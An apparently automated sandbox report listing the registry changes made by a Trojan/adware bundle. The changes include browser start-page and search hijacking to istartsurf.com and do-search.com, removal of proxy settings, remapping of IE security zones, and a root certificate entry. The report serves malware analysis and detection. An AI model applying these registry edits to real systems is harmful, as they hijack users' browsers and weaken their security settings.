[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\IHProtect]
"ptid" = "pcm"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process XTab_Setup2121.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"

[HKLM\SOFTWARE\SupDp]
"dir" = "%Program Files%\XTab"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 FA 39 C5 07 09 48 4F 9E 13 1F 12 D5 EF AA 55"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKLM\SOFTWARE\supTab]
"ptid" = "pcm"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wpm_v20.0.0.1953_0302.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 8F 9B 36 34 E9 3F 9C 4D 42 38 F8 54 74 2E 1A"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 71 D9 11 3C CF 3D D2 F0 3B 77 4F 30 26 04 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"UninstallString" = "%Program Files%\GOSafer\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayName" = "GOSafer"
"QuietUninstallString" = "%Program Files%\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(qR8OYLNuOiibJ6QjgTQRjI)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"

The process net.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 35 59 43 40 22 67 9C 33 E6 7A 8E 17 B6 E8 49"

The process net.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 95 F0 C0 7F B2 9F E0 F1 B5 66 C1 6B E0 42 DF"

The process net.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF B4 4B F8 EC 5B C0 B2 3A A9 78 81 39 25 28 3D"

The process net.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 40 79 76 4E 28 06 AD 7C 18 D5 D8 09 BF C5 41"

The process QQBrowser.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B E8 C2 8B 50 D8 4A DC FE 9E 2D 1B 9D 6E 3C 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"RegWrite.exe" = "RegWrite"
"wpm_v20.0.0.1953_0302.exe" = "Windows SysTool Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"XTab_Setup2121.exe" = "XTab"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process QQBrowser.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe -ptid=pcm"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe"
"DisplayName" = "istartsurf uninstall"
"Publisher" = "istartsurf"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 52 46 A8 6D 26 87 85 1B 7A 08 0C 12 09 A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
"SearchAssistant" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 99 B5 77 EB AC 96 F0 AA 66 D1 DE 39 8C 6E 8C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"Publisher" = "Related Deals LLC"

[HKLM\SOFTWARE\CashReminder]
"affid" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"UninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"

[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: Vi8QYQCatMvm1PLT8H1tqpJtGKSso)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"

The process HPNotify.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 91 A0 A2 E4 C7 AD 39 4F 9C E0 63 ED 5E CA 69"

The process ActSys.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "17"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 40 06 25 78 53 38 7D 1F 3C 1E B9 70 4A 64 EF"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E9C15E05782C5BADC4287A994D1DDEDB171B8B2A]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 E9 C1 5E 05"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
